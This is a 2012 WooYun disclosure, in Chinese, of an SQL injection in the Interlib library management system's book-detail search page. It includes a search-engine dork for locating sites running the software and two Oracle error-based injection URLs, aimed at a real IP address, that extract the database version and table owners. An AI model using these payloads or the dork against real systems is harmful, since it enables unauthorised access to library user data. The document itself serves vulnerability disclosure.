当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011223

漏洞标题:Interlib图书馆集群管理系统 图书详细信息页面存在注射漏洞

相关厂商:广州图创计算机软件开发有限公司

漏洞作者: Slcio

提交时间:2012-08-23 16:42

修复时间:2012-10-07 16:43

公开时间:2012-10-07 16:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-10-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Interlib图书馆集群管理系统用于大多数高校以及地方图书馆的用户在线检索系统,图书详细信息页面存在注射漏洞引起图书馆用户信息泄露等问题。

详细说明:

漏洞是以广州图书馆检索系统为例,同时通过百度或google搜索
inurl:interlib/websearch/bookSearch
可以得到多个利用这套系统的站点,且都存在该漏洞。

漏洞证明:

http://210.72.4.33/interlib/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=1170693%20and%201=(select%20upper(XMLType('<:'||(select%20replace(banner,chr(32),'--')%20from%20sys.v_$version%20where%20rownum=1)||':>'))%20from%20dual)--
http://210.72.4.33/interlib/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=1170693%20and%201=(select%20upper(XMLType('<:'||(select%20replace(wm_concat(distinct%20owner),',','-----')%20from%20all_tables)||':>'))%20from%20dual)--

修复方案:

厂商升级补丁

版权声明:转载请注明来源 Slcio@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝